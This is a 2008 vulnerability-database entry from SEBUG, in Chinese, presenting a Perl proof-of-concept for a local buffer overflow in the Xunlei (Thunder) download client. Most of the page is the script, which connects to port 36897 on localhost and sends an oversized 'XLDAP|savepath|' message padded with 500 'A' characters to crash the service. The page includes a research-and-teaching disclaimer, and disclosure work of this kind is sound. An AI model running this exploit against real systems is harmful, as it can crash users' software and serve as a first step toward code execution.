迅雷本地溢出POC

SBEUGID:SEBUGE2008053539
发布时间:2008-05-11
[www.sebug.net]
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

#!/usr/bin/perl
use IO::Socket;

if ($socket = IO::Socket::INET->new(PeerAddr => “127.0.0.1″,PeerPort => “36897″,Proto => “TCP”))
{
$exploit  = “XLDAP|savepath|”.
#    (”A” x 397).
(”A” x 500).
“|XLDAP”;

print $socket $exploit;
sleep(1);
close($socket);
}
else
{
print “Cannot connect to localhost:36897 port\n”;
}

// Sebug.net [ 2008-05-11 ]

本信息由SEBUG翻译整理,版权所有,未经许可,不得转载

提交信息 | 本站声明 | 帮助 | 论坛 | 合作伙伴
Copyright © SEBUG Security Database 2006  All rights Reserved.
鄂ICP备05024839号